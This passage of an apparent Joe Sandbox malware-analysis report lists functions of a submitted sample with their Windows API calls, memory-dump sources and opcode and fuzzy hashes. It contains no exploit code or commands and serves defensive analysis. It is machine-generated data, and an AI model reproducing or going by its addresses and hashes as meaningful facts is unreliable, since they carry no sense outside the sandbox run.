                                                                      • Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                    • ??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                    • String ID:
                                                                    • API String ID: 1642057587-0
                                                                    • Opcode ID: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
                                                                    • Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
                                                                    • Opcode Fuzzy Hash: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
                                                                    • Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98
                                                                    Function 0040172C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002D,0000002D,?,00406616,?,00419810,00419810), ref: 00401739
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6
                                                                      • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                      • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                      • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                      • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@FileTime$??3@AttributesSystemlstrlen
                                                                    • String ID: ExecuteFile
                                                                    • API String ID: 1306139538-323923146
                                                                    • Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                    • Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
                                                                    • Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                    • Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628
                                                                    Function 0040E036 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                    • memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memmove
                                                                    • String ID:
                                                                    • API String ID: 3828600508-0
                                                                    • Opcode ID: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
                                                                    • Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
                                                                    • Opcode Fuzzy Hash: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
                                                                    • Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659
                                                                    Function 004026CF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID: @
                                                                    • API String ID: 1890195054-2766056989
                                                                    • Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                    • Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
                                                                    • Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                    • Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C
                                                                    Function 0040C7E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: lA
                                                                    • API String ID: 613200358-262130271
                                                                    • Opcode ID: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
                                                                    • Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
                                                                    • Opcode Fuzzy Hash: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
                                                                    • Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED
                                                                    Function 0041017A Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@H_prolog
                                                                    • String ID:
                                                                    • API String ID: 1329742358-0
                                                                    • Opcode ID: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
                                                                    • Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
                                                                    • Opcode Fuzzy Hash: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
                                                                    • Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D
                                                                    Function 00401172 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
                                                                    • Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
                                                                    • Opcode Fuzzy Hash: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
                                                                    • Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754
                                                                    Function 0040250F Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
                                                                    • Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
                                                                    • Opcode Fuzzy Hash: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
                                                                    • Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768
                                                                    Function 0040C8F9 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0040C922
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer
                                                                    • String ID:
                                                                    • API String ID: 2976181284-0
                                                                    • Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                    • Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
                                                                    • Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                    • Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64
                                                                    Function 0040269A Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
                                                                    • Instruction ID: 6a7e44d1361fbcc4c06fb61f3001a61fff325a62d5d84498b6a11b5e2c7c739c
                                                                    • Opcode Fuzzy Hash: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
                                                                    • Instruction Fuzzy Hash: BBB0923280C260AEBA3A3E15F9038C967D5EF1023A321856FF089112656E972D92668C
                                                                    Function 0040DA22 Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                    • Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
                                                                    • Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                    • Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4
                                                                    Function 00410329 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                    • Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
                                                                    • Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                    • Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55
                                                                    Function 00401252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFileAttributesW.KERNELBASE(?,?), ref: 00401296
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                    • Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
                                                                    • Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                    • Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59
                                                                    Function 0040C95F Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle
                                                                    • String ID:
                                                                    • API String ID: 3498533004-0
                                                                    • Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                    • Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
                                                                    • Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                    • Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99
                                                                    Function 0040CAA0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                    • Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
                                                                    • Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                    • Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54
                                                                    Function 00406E05 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: _beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 3014514943-0
                                                                    • Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                    • Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
                                                                    • Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                    • Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0
                                                                    Function 0040C9E5 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                    • Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
                                                                    • Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                    • Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54
                                                                    Function 004127AA Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                    • Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
                                                                    • Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
